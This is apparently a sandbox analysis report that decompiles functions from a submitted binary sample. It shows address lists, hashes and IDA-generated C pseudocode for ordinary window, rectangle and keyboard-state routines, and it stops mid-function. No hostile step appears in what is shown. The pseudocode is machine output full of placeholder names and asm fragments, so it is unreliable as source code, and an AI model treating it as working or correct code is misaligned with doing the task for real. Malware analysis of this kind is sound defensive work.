0x00cfcaf0
0x00cfcaf2
0x00cfcaf4
0x00cfcaf5
0x00cb3436
0x00cb3437
0x00cb3438
0x00cb3439
0x00cb343b
0x00cb343e
0x00cb3440
0x00cb344b
0x00cb3453
0x00cb3453
0x00cb3455
0x00cb345a
0x00cb345d
0x00cb345f
0x00cb346b
0x00cb3471
0x00cb3471
0x00cb3473
0x00cb3476
0x00cb3478
0x00cb3482
0x00cb3488
0x00cb348a
0x00cb348a
0x00cb348d
0x00cb3490
0x00cb3492
0x00cb3496
0x00cb3496
0x00cb349b
0x00cb349e
0x00cb34a0
0x00cb34ab
0x00cb34b3
0x00cb34b5
0x00cb34b5
0x00cb34b5
0x00cb34b5
0x00cb34b9
0x00cb34bb
0x00cb34bc
0x00cb34bd
0x00cb236a
0x00cb236c
0x00cb237d
0x00cb2381
0x00cb23a3
0x00cb23a8
0x00cb23a9
0x00cb23aa
0x00cb23ad
0x00cb23af
0x00cb23b2
0x00cb23b4
0x00cb23bf
0x00cb23bf
0x00cb23c0
0x00cb23c5
0x00cb23c7
0x00cb2408
0x00cb240d
0x00cb241f
0x00cb242c
0x00cb23c9
0x00cb23c9
0x00cb23cc
0x00cb23cf
0x00cb23d4
0x00cb23d7
0x00cb23d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb23d9
0x00cb23b6
0x00cb23b6
0x00cb23b9
0x00cb2405
0x00cb2407
0x00cb23bb
0x00cb23bb
0x00cb23bd
0x00cb23db
0x00cb23db
0x00cb23de
0x00cb23e0
0x00cb23e0
0x00cb23e3
0x00cb23e5
0x00cb23f7
0x00cb23ff
0x00cb23e7
0x00cb23e8
0x00cb23e8
0x00cb2401
0x00cb2401
0x00cb2403
0x00cb2403
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb23bd
0x00cb23b9
0x00cb2383
0x00cb2396
0x00cb23a2
0x00cb23a2
0x00d039f8
0x00d039fd
0x00d03a07
0x00d03a0f
0x00d03a11
0x00000000
0x00d03a17
0x00d03a20
0x00d03a2a
0x00d03a32
0x00d03a34
0x00000000
0x00d03a3a
0x00d03a44
0x00d03a49
0x00d03a50
0x00d03a55
0x00d03a55
0x00000000
0x00d03a55
0x00d03a34
0x00d03a11
0x00d039f2
0x00d039d6
0x00d039ca
0x00d03701
0x00d03701
0x00d03b6d
0x00d03b72
0x00d03b72

APIs

__EH_prolog3_GS.LIBCMT ref: 00D036EC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-0
Opcode ID: 0e9a3c9e098d5ae61187736760b84c7ecb9a09f4eec15edad13f5187ae4b605d
Instruction ID: 7209507545c4db1859d58a397fe972bb2c34642dabfc327b23fe06bcf170b88d
Opcode Fuzzy Hash: 0e9a3c9e098d5ae61187736760b84c7ecb9a09f4eec15edad13f5187ae4b605d
Instruction Fuzzy Hash: 75D1A071A002159BCF25DF64CC85BEE77A9AF44710F18027AFD19AB2C6DB709A05DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D3F6BB Relevance: 6.3, APIs: 4, Instructions: 288
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00D3F6BB(signed int __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, RECT* _a16, intOrPtr _a20, signed int* _a24) {
				signed int _v8;
				struct tagRECT _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int* _v44;
				intOrPtr _v48;
				signed int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t87;
				void* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int _t105;
				signed int _t106;
				signed int _t114;
				signed int _t115;
				long _t118;
				intOrPtr* _t133;
				signed int _t139;
				intOrPtr* _t143;
				long _t146;
				RECT* _t149;
				intOrPtr _t157;
				long _t158;
				signed int _t168;
				void* _t203;
				signed int _t219;

				_t203 = __edx;
				_t87 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t87 ^ _t219;
				_t149 = _a16;
				_t204 = _a4;
				_t208 = __ecx;
				_v48 = _a20;
				_v28 = __ecx;
				_v32 = _t204;
				_v44 = _a24;
				SetRectEmpty(_t149);
				if(GetKeyState(0x11) < 0) {
					L30:
					return E00DDCBCE(_t92, _t149, _v8 ^ _t219, _t203, _t204, _t208);
				}
				_v52 = _v52 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t95 = E00CACA6C(0xe68680, _t204);
				 *0xe17a64(_a8, _a12, _t95, 1);
				_t97 =  *((intOrPtr*)( *((intOrPtr*)( *_t208 + 0x14))))();
				_v40 = _t97;
				if(_t97 == 0) {
					L3:
					_t98 = _v28;
					_t157 =  *((intOrPtr*)(_t98 + 0x1b8));
					if(_t157 == 0 ||  *((intOrPtr*)(_t157 + 8)) == 0 ||  *((intOrPtr*)(_t157 + 4)) == 0) {
						_t158 = 0;
						__eflags = 0;
					} else {
						_t143 = E00CACA6C(0xe68680, _t204);
						 *0xe17a64();
						_t146 = E00CACA6C(0xe1f3d8,  *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x1a8))))());
						_t204 = _v32;
						_t158 = _t146;
						_t98 = _v28;
					}
					 *0xe17a64(_a8, _a12,  *0xe686ec, 1, 0, 1, _t158);
					_t208 = E00CACA6C(0xe6896c,  *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0x10))))());
					_v40 = _t208;
					if(_t208 == 0 || E00D88E8A(_t208, _t204) == 0) {
						_t92 = E00D408A6(_v28, _t203, __eflags, _a8, _a12,  &_v36,  &_v52);
						 *_v44 =  *_v44 & 0x00000000;
						__eflags = _t92;
						if(_t92 == 0) {
							goto L30;
						}
						_t105 = E00CACB0B(_t204, 0xe68680);
						__eflags = _t105;
						if(_t105 == 0) {
							_t106 = E00CACB0B(_t204, 0xe6896c);
							__eflags = _t106;
							if(_t106 == 0) {
								L22:
								_v24.left = 0;
								_v24.top = 0;
								_v24.right = 0;
								_v24.bottom = 0;
								GetWindowRect( *(_t204 + 0x20),  &_v24);
								asm("sbb eax, eax");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t204 = _v28;
								_t114 = E00CB7738( *((intOrPtr*)(_t204 + 0xe4)));
								_t168 = _v36;
								_t115 = _t114 & 0x00400000;
								__eflags = _t168 - 0x1000;
								if(_t168 == 0x1000) {
									__eflags = _t115;
									if(_t115 == 0) {
										L28:
										_t118 = _v24.right - _v24.left + _t149->left;
										__eflags = _t118;
										_t149->right = _t118;
										L29:
										_t208 =  *((intOrPtr*)( *_t204 + 0x5c));
										 *0xe17a64(_t149, _t168);
										 *( *((intOrPtr*)( *_t204 + 0x5c)))();
										_t92 = E00CB9BF2( *((intOrPtr*)(_t204 + 0xe4)), _t149);
										goto L30;
									}
									L33:
									_t149->left = _t149->right - _v24.right + _v24.left;
									goto L29;
								}
								__eflags = _t168 - 0x2000;
								if(_t168 == 0x2000) {
									_t149->bottom = _t149->top - _v24.top + _v24.bottom;
									goto L29;
								}
								__eflags = _t168 - 0x4000;
								if(_t168 == 0x4000) {
									__eflags = _t115;
									if(_t115 == 0) {
										goto L33;
									}
									goto L28;
								}
								__eflags = _t168 - 0x8000;
								if(_t168 == 0x8000) {
									_t149->top = _t149->bottom - _v24.bottom + _v24.top;
								}
								goto L29;
							}
							_t204 = E00CACA6C(0xe6896c, _t204);
							L20:
							_t208 =  *((intOrPtr*)( *_t204 + 0x198));
							 *0xe17a64();
							_t92 =  *( *((intOrPtr*)( *_t204 + 0x198)))();
							__eflags = _v36 & _t92;
							if((_v36 & _t92) == 0) {
								goto L30;
							}
							L21:
							_t204 = _v32;
							goto L22;
						}
						_t133 = E00CACA6C(0xe68680, _t204);
						 *0xe17a64();
						_t204 = E00CACA6C(0xe1f7d4,  *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x1a8))))());
						__eflags = _t204;
						if(_t204 == 0) {
							goto L21;
						}
						goto L20;
					} else {
						if(E00CACB0B(_t204, 0xe68680) == 0) {
							L13:
							_t139 = E00D88E8A(_t208, _t204);
							_t204 = _t139;
							_t208 =  *((intOrPtr*)( *_t139 + 0x29c));
							 *0xe17a64(_v32, _a8, _a12, _t149, _v48, _v44);
							_t92 =  *( *((intOrPtr*)( *_t139 + 0x29c)))();
							goto L30;
						}
						_t208 =  *((intOrPtr*)( *_t208 + 0x338));
						 *0xe17a64(E00CACA6C(0xe68680, _t204));
						if( *_t208() == 0) {
							goto L30;
						}
						_t208 = _v40;
						goto L13;
					}
				}
				_t208 =  *((intOrPtr*)( *_t97 + 0x1c0));
				 *0xe17a64(_t204, _a8, _a12, _t149, _v48, _v44);
				 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x1c0))))();
				if(IsRectEmpty(_t149) == 0) {
					goto L30;
				}
				goto L3;
			}

0x00d3f6bb
0x00d3f6c1
0x00d3f6c8
0x00d3f6cf
0x00d3f6d4
0x00d3f6d7
0x00d3f6d9
0x00d3f6e0
0x00d3f6e3
0x00d3f6e6
0x00d3f6e9
0x00d3f6fa
0x00d3f9c1
0x00d3f9cf
0x00d3f9cf
0x00d3f702
0x00d3f706
0x00d3f713
0x00d3f725
0x00d3f72e
0x00d3f730
0x00d3f735
0x00d3f769
0x00d3f769
0x00d3f76c
0x00d3f774
0x00d3f7bc
0x00d3f7bc
0x00d3f782
0x00d3f788
0x00d3f79b
0x00d3f7ab
0x00d3f7b0
0x00d3f7b5
0x00d3f7b7
0x00d3f7b7
0x00d3f7d8
0x00d3f7ee
0x00d3f7f0
0x00d3f7f7
0x00d3f885
0x00d3f88d
0x00d3f890
0x00d3f892
0x00000000
0x00000000
0x00d3f8a0
0x00d3f8a5
0x00d3f8a7
0x00d3f8e5
0x00d3f8ea
0x00d3f8ec
0x00d3f919
0x00d3f91b
0x00d3f91e
0x00d3f921
0x00d3f924
0x00d3f92e
0x00d3f93e
0x00d3f94b
0x00d3f94c
0x00d3f94d
0x00d3f94e
0x00d3f94f
0x00d3f958
0x00d3f95d
0x00d3f960
0x00d3f965
0x00d3f96b
0x00d3f9e0
0x00d3f9e2
0x00d3f997
0x00d3f99d
0x00d3f99d
0x00d3f99f
0x00d3f9a2
0x00d3f9a6
0x00d3f9ab
0x00d3f9b3
0x00d3f9bc
0x00000000
0x00d3f9bc
0x00d3f9e4
0x00d3f9ed
0x00000000
0x00d3f9ed
0x00d3f96d
0x00d3f973
0x00d3f9db
0x00000000
0x00d3f9db
0x00d3f975
0x00d3f97b
0x00d3f993
0x00d3f995
0x00000000
0x00000000
0x00000000
0x00d3f995
0x00d3f97d
0x00d3f983
0x00d3f98e
0x00d3f98e
0x00000000
0x00d3f983
0x00d3f8f7
0x00d3f8f9
0x00d3f8fb
0x00d3f903
0x00d3f90b
0x00d3f90d
0x00d3f910
0x00000000
0x00000000
0x00d3f916
0x00d3f916
0x00000000
0x00d3f916
0x00d3f8ab
0x00d3f8be
0x00d3f8d3
0x00d3f8d7
0x00d3f8d9
0x00000000
0x00000000
0x00000000
0x00d3f804
0x00d3f812
0x00d3f842
0x00d3f844
0x00d3f84c
0x00d3f85d
0x00d3f865
0x00d3f86d
0x00000000
0x00d3f86d
0x00d3f824
0x00d3f82c
0x00d3f839
0x00000000
0x00000000
0x00d3f83f
0x00000000
0x00d3f83f
0x00d3f7f7
0x00d3f743
0x00d3f74f
0x00d3f758
0x00d3f763
0x00000000
0x00000000
0x00000000

APIs

SetRectEmpty.USER32(?), ref: 00D3F6E9
GetKeyState.USER32 ref: 00D3F6F1
IsRectEmpty.USER32 ref: 00D3F75B
GetWindowRect.USER32 ref: 00D3F92E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty$StateWindow
String ID:
API String ID: 2684165152-0
Opcode ID: 8b9d663217715ffe5f0601dc981d6c0bfa06a6ca339dac8c0f0c3223ff806a3c
Instruction ID: 090caf1a2ff928e9a8d89a683bfdbdbb2ae63a038276913fa1657d775980e8bf
Opcode Fuzzy Hash: 8b9d663217715ffe5f0601dc981d6c0bfa06a6ca339dac8c0f0c3223ff806a3c
Instruction Fuzzy Hash: C0A17D72A04219AFCF05DF64D985BAE7BB6EF48710F184069F805A7290CB31AD41DF74

Uniqueness

Uniqueness Score: -1.00%

Function 00CFC30C Relevance: 6.3, APIs: 4, Instructions: 287
windowCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CFC30C(void* __ebx, intOrPtr* __ecx, signed int _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16, signed int _a20) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				long _v32;
				long _v36;
				struct HWND__* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct HWND__* _v56;
				signed int _v60;
				intOrPtr _v64;
				struct HWND__* _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t120;
				signed int _t129;
				struct HWND__* _t141;
				struct HWND__* _t142;
				signed int _t147;
				struct HWND__* _t150;
				signed int _t151;
				signed int _t152;
				intOrPtr _t160;
				struct HWND__* _t162;
				struct HWND__* _t164;
				struct HWND__* _t167;
				signed int _t172;
				void* _t179;
				signed int _t182;
				intOrPtr _t194;
				intOrPtr* _t197;
				intOrPtr* _t198;
				signed int _t199;
				intOrPtr* _t200;
				intOrPtr* _t202;
				intOrPtr* _t205;
				struct HWND__* _t206;
				struct HWND__* _t218;
				struct HWND__* _t224;
				struct HWND__* _t225;
				struct HWND__* _t242;
				signed int _t244;
				signed int _t250;
				intOrPtr* _t251;
				struct HWND__* _t252;
				void* _t253;
				signed int _t257;
				signed int _t260;
				long _t264;
				intOrPtr _t268;
				signed int _t271;
				signed int _t272;
				signed int _t275;

				_t202 = __ecx;
				_t271 = _t275;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_t260 = _a12;
				_t197 = __ecx;
				_t250 = _a4;
				if(_t250 < 0 || _t260 <= 0) {
					E00CAA4E7(_t197, _t202, _t250, _t260, __eflags);
					asm("int3");
					_push(4);
					E00DDD52C(0xe08583, _t197, _t250, _t260);
					_t198 = _t202;
					_t120 = E00CB7697(_a4);
					__eflags = _t120 - 0xffffffff;
					if(_t120 == 0xffffffff) {
						L11:
						return E00DDD4FA(_t120);
					} else {
						E00CA67E1( &(_v28.right));
						_v8 = _v8 & 0x00000000;
						_t205 =  &(_v28.right);
						__eflags = E00CA2A90(_t205, _a8);
						if(__eflags == 0) {
							E00CAA4E7(_t198, _t205, _t250, _t260, __eflags);
							asm("int3");
							_push(0x34);
							E00DDD55F(0xe0bcc4, _t198, _t250, _t260);
							_t251 = _t205;
							_t206 = _a8;
							_v48 = _v48 & 0x00000000;
							_t199 = _a20;
							_t244 = _a4;
							_v52 = _t206;
							_v64 = _a16;
							_v44 = _t199;
							__eflags = _t206;
							if(__eflags == 0) {
								E00CAA4E7(_t199, _t206, _t251, _t260, __eflags);
								asm("int3");
								_push(_t271);
								_t272 = _t275;
								_t129 =  *0xe68dd4; // 0x8d2643c2
								_t130 = _t129 ^ _t272;
								_v40 = _t129 ^ _t272;
								__eflags = _v28.left;
								_push(_t251);
								_t252 = _t206;
								if(_v28.left >= 0) {
									_v28.left = 0;
									_v28.top = 0;
									_v28.right = 0;
									_v28.bottom = 0;
									 *0xe17a64(_v0,  &_v28, _t260);
									_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t252->i + 0x1b8))))();
									_pop(_t260);
									__eflags = _t130;
									if(_t130 != 0) {
										InvalidateRect( *(_t252 + 0x20),  &_v28, 1);
										_t130 = UpdateWindow( *(_t252 + 0x20));
									}
								}
								__eflags = _v12 ^ _t272;
								_pop(_t253);
								return E00DDCBCE(_t130, _t199, _v12 ^ _t272, _t244, _t253, _t260);
							} else {
								 *0xe17a64(_t244, _t206, _t199);
								_v40 =  *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x2c4))))();
								_t141 = IsWindowVisible( *(_t251 + 0x20));
								__eflags = _t141;
								if(_t141 == 0) {
									E00CB7B32(_t251, 5);
								}
								_t142 = _a12;
								_t200 = _t251 + 0xbc;
								__eflags = _t142;
								if(_t142 < 0) {
									L17:
									_a12 =  *_t200;
								} else {
									__eflags = _t142 -  *_t200;
									if(_t142 >  *_t200) {
										goto L17;
									}
								}
								 *0xe17a64();
								_v56 =  *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x210))))();
								_t147 = E00CACB0B(_v40, 0xe6896c);
								asm("sbb eax, eax");
								_v60 =  ~_t147 & _v44;
								_t150 = E00CA9583(__eflags, 0x48);
								_v68 = _t150;
								_t264 = 0;
								_v8 = 0;
								__eflags = _t150;
								if(__eflags == 0) {
									_t151 = 0;
								} else {
									_push(_v52);
									E00CA2ABC(_t200,  &_v44, _t251,  *((intOrPtr*)(_t251 + 0x108)), __eflags);
									_v48 = 1;
									_v8 = 1;
									_t151 = E00CFA5C0(_t200, _v68, _t251,  *((intOrPtr*)(_t251 + 0x108)), __eflags,  &_v44, _v64, _v40,  *((intOrPtr*)(_t251 + 0x108)), _v60);
									_t264 = 0;
								}
								_push(1);
								_push(_t151);
								_v8 = 2;
								_t152 = E00CC2970(_t200, _t251, _a12);
								_v8 = _v8 | 0xffffffff;
								__eflags = _v48 & 0x00000001;
								if((_v48 & 0x00000001) != 0) {
									_t152 = E00CA2975(_t152, _v44 - 0x10);
								}
								 *_t200 =  *_t200 + 1;
								_t218 =  *(_t251 + 0xf8);
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags =  *(_t218 + 0x20);
									if( *(_t218 + 0x20) != 0) {
										_v36 = _t264;
										_v32 = _t264;
										_v28.left = _t264;
										_v28.top = _t264;
										__eflags =  *((intOrPtr*)(_t251 + 0x100)) - _t264;
										if(__eflags == 0) {
											_t172 = _v52;
										} else {
											_t172 = _t152 | 0xffffffff;
										}
										E00D092B0(_t218,  &_v36, __eflags, _t251, _t172,  &_v36,  *((intOrPtr*)(_t251 + 0x108)));
									}
								}
								 *((intOrPtr*)(_t251 + 0x108)) =  *((intOrPtr*)(_t251 + 0x108)) + 1;
								E00CC840B(_t200, _t251 + 0xa8, _t264);
								 *0xe17a64(0xffffffff);
								 *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x26c))))();
								_t266 =  *((intOrPtr*)( *_t251 + 0x184));
								 *0xe17a64();
								 *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x184))))();
								__eflags =  *_t200 - 1;
								if( *_t200 != 1) {
									_t160 =  *((intOrPtr*)(_t251 + 0xc0));
									_t224 =  *(_t251 + 0x120);
									 *((intOrPtr*)(_t251 + 0x1e4)) = _t160;
									__eflags = _t160 - _a12;
									if(_t160 != _a12) {
										__eflags = _t224;
										if(_t224 != 0) {
											_t164 = _v40;
											__eflags = _t164;
											if(_t164 != 0) {
												__eflags =  *(_t164 + 0x20);
												if( *(_t164 + 0x20) != 0) {
													_push(0);
													_t225 = _t164;
													goto L40;
												}
											}
										}
									} else {
										 *((intOrPtr*)(_t251 + 0x1e4)) = _t160 + 1;
										__eflags = _t224;
										if(_t224 != 0) {
											_t167 = _v56;
											__eflags = _t167;
											if(_t167 != 0) {
												E00CB7B32(_t167, 0);
											}
										}
										_t225 = _v40;
										_push(1);
										L40:
										E00CB7B32(_t225);
									}
								} else {
									_t266 =  *((intOrPtr*)( *_t251 + 0x214));
									 *0xe17a64(0);
									 *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x214))))();
								}
								__eflags =  *(_t251 + 0x120);
								if( *(_t251 + 0x120) == 0) {
									_t162 = _v56;
									__eflags = _t162;
									if(_t162 != 0) {
										__eflags =  *(_t162 + 0x20);
										if( *(_t162 + 0x20) != 0) {
											BringWindowToTop( *(_t162 + 0x20));
										}
									}
								}
								return E00DDD50E(_t200, _t251, _t266);
							}
						} else {
							_t268 = _v28.right;
							 *0xe17a64(_a4, _t268, _a20);
							_t179 =  *((intOrPtr*)( *((intOrPtr*)( *_t198 + 0x2c4))))();
							 *0xe17a64(_t179, _t268, _a12, _a16, _a20);
							_t120 = E00CA2975( *((intOrPtr*)( *((intOrPtr*)( *_t198 + 0x194))))(), _t268 - 0x10);
							goto L11;
						}
					}
				} else {
					_t182 =  *((intOrPtr*)(__ecx + 8));
					_t239 = _t250 + _t260;
					_v8 = _t182;
					_v12 = _t250 + _t260;
					_push(0xffffffff);
					if(_t250 < _t182) {
						E00CC840B(__ecx, __ecx, _t182 + _t260);
						_t257 = _t250 << 2;
						E00CA5028(_t197,  *((intOrPtr*)(_t197 + 4)), _t257,  *((intOrPtr*)(_t197 + 4)) + _v12 * 4, _v8 - _t250 << 2,  *((intOrPtr*)(_t197 + 4)) + _t257, _v8 - _t250 << 2);
						__eflags =  *((intOrPtr*)(_t197 + 4)) + _t257;
						E00DDFBE0(_t257,  *((intOrPtr*)(_t197 + 4)) + _t257, 0, _t260 << 2);
					} else {
						E00CC840B(__ecx, __ecx, _t239);
						_t257 = _t250 << 2;
					}
					_t242 = _a8;
					goto L6;
					L6:
					_t194 =  *((intOrPtr*)(_t197 + 4));
					 *(_t257 + _t194) = _t242;
					_t257 = _t257 + 4;
					_t260 = _t260 - 1;
					if(_t260 != 0) {
						goto L6;
					} else {
						return _t194;
					}
				}
			}

0x00cfc30c
0x00cfc30d
0x00cfc30f
0x00cfc310
0x00cfc311
0x00cfc313
0x00cfc316
0x00cfc319
0x00cfc31e
0x00cfc39b
0x00cfc3a0
0x00cfc3a1
0x00cfc3a8
0x00cfc3ad
0x00cfc3b2
0x00cfc3b7
0x00cfc3ba
0x00cfc41c
0x00cfc421
0x00cfc3bc
0x00cfc3bf
0x00cfc3c7
0x00cfc3cb
0x00cfc3d3
0x00cfc3d5
0x00cfc424
0x00cfc429
0x00cfc42a
0x00cfc431
0x00cfc436
0x00cfc438
0x00cfc43b
0x00cfc442
0x00cfc445
0x00cfc448
0x00cfc44b
0x00cfc44e
0x00cfc451
0x00cfc453
0x00cfc658
0x00cfc65d
0x00cfc65e
0x00cfc65f
0x00cfc664
0x00cfc669
0x00cfc66b
0x00cfc66e
0x00cfc672
0x00cfc673
0x00cfc675
0x00cfc679
0x00cfc67c
0x00cfc67f
0x00cfc682
0x00cfc697
0x00cfc69f
0x00cfc6a1
0x00cfc6a2
0x00cfc6a4
0x00cfc6af
0x00cfc6b8
0x00cfc6b8
0x00cfc6a4
0x00cfc6c1
0x00cfc6c3
0x00cfc6ca
0x00cfc459
0x00cfc466
0x00cfc473
0x00cfc476
0x00cfc47c
0x00cfc47e
0x00cfc484
0x00cfc484
0x00cfc489
0x00cfc48c
0x00cfc492
0x00cfc494
0x00cfc49a
0x00cfc49c
0x00cfc496
0x00cfc496
0x00cfc498
0x00000000
0x00000000
0x00cfc498
0x00cfc4a9
0x00cfc4bb
0x00cfc4be
0x00cfc4c7
0x00cfc4cc
0x00cfc4cf
0x00cfc4d5
0x00cfc4d8
0x00cfc4da
0x00cfc4dd
0x00cfc4df
0x00cfc517
0x00cfc4e1
0x00cfc4e1
0x00cfc4ed
0x00cfc4f8
0x00cfc506
0x00cfc50e
0x00cfc513
0x00cfc513
0x00cfc519
0x00cfc51b
0x00cfc525
0x00cfc52c
0x00cfc531
0x00cfc535
0x00cfc539
0x00cfc541
0x00cfc541
0x00cfc546
0x00cfc548
0x00cfc54e
0x00cfc550
0x00cfc552
0x00cfc556
0x00cfc558
0x00cfc55b
0x00cfc55e
0x00cfc561
0x00cfc564
0x00cfc56a
0x00cfc571
0x00cfc56c
0x00cfc56c
0x00cfc56c
0x00cfc580
0x00cfc580
0x00cfc556
0x00cfc585
0x00cfc594
0x00cfc5a3
0x00cfc5ab
0x00cfc5af
0x00cfc5b7
0x00cfc5bf
0x00cfc5c1
0x00cfc5c4
0x00cfc5de
0x00cfc5e4
0x00cfc5ea
0x00cfc5f0
0x00cfc5f3
0x00cfc617
0x00cfc619
0x00cfc61b
0x00cfc61e
0x00cfc620
0x00cfc622
0x00cfc626
0x00cfc628
0x00cfc62a
0x00000000
0x00cfc62a
0x00cfc626
0x00cfc620
0x00cfc5f5
0x00cfc5f6
0x00cfc5fc
0x00cfc5fe
0x00cfc600
0x00cfc603
0x00cfc605
0x00cfc60b
0x00cfc60b
0x00cfc605
0x00cfc610
0x00cfc613
0x00cfc62c
0x00cfc62c
0x00cfc62c
0x00cfc5c6
0x00cfc5ca
0x00cfc5d2
0x00cfc5da
0x00cfc5da
0x00cfc631
0x00cfc638
0x00cfc63a
0x00cfc63d
0x00cfc63f
0x00cfc641
0x00cfc645
0x00cfc64a
0x00cfc64a
0x00cfc645
0x00cfc63f
0x00cfc655
0x00cfc655
0x00cfc3d7
0x00cfc3dc
0x00cfc3eb
0x00cfc3f3
0x00cfc40a
0x00cfc417
0x00000000
0x00cfc417
0x00cfc3d5
0x00cfc324
0x00cfc324
0x00cfc327
0x00cfc32a
0x00cfc32d
0x00cfc330
0x00cfc334
0x00cfc348
0x00cfc355
0x00cfc368
0x00cfc376
0x00cfc37b
0x00cfc336
0x00cfc339
0x00cfc33e
0x00cfc33e
0x00cfc383
0x00cfc383
0x00cfc386
0x00cfc386
0x00cfc389
0x00cfc38c
0x00cfc38f
0x00cfc392
0x00000000
0x00cfc394
0x00cfc398
0x00cfc398
0x00cfc392

APIs

__EH_prolog3.LIBCMT ref: 00CFC3A8
__EH_prolog3_GS.LIBCMT ref: 00CFC431
IsWindowVisible.USER32(?), ref: 00CFC476
BringWindowToTop.USER32 ref: 00CFC64A

Part of subcall function 00CB7B32: ShowWindow.USER32(?,?,?,?,00CB5158,00000001), ref: 00CB7B43

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$BringH_prolog3H_prolog3_ShowVisible
String ID:
API String ID: 1019583663-0
Opcode ID: 65d9c1fd57610060763db4d89be2280d4b3350af0b5d7057031912d57a64ae4b
Instruction ID: c0f4c58ffd070eca067a2bc53190206f8d5eb78841d875a027127b56678dd349
Opcode Fuzzy Hash: 65d9c1fd57610060763db4d89be2280d4b3350af0b5d7057031912d57a64ae4b
Instruction Fuzzy Hash: 9BB17930B0021AAFCF14DF64C995AFEBBB6BF48314F144159F925A7391CB30AA15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE9326 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CE9326(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed int _a20, char _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, signed int _a40, signed int _a44, intOrPtr _a48, signed int _a52) {
				signed int _v4;
				struct tagRECT _v32;
				signed int _v36;
				struct HBRUSH__* _v40;
				char _v44;
				char _v52;
				char _v60;
				signed int _t77;
				void* _t78;
				intOrPtr _t79;
				signed int _t82;
				signed int _t107;
				intOrPtr* _t129;
				intOrPtr _t130;
				intOrPtr* _t133;
				void* _t154;
				signed int _t157;
				intOrPtr* _t158;
				char* _t161;
				signed int _t162;
				intOrPtr _t163;
				intOrPtr* _t164;

				_t154 = __edx;
				_push(0x30);
				E00DDD55F(0xe0afce, __ebx, __edi, __esi);
				_t161 =  &_a24;
				_t129 = _a8;
				asm("movsd");
				_v36 = _a20;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				InflateRect( &_v32, 0xffffffff, 0);
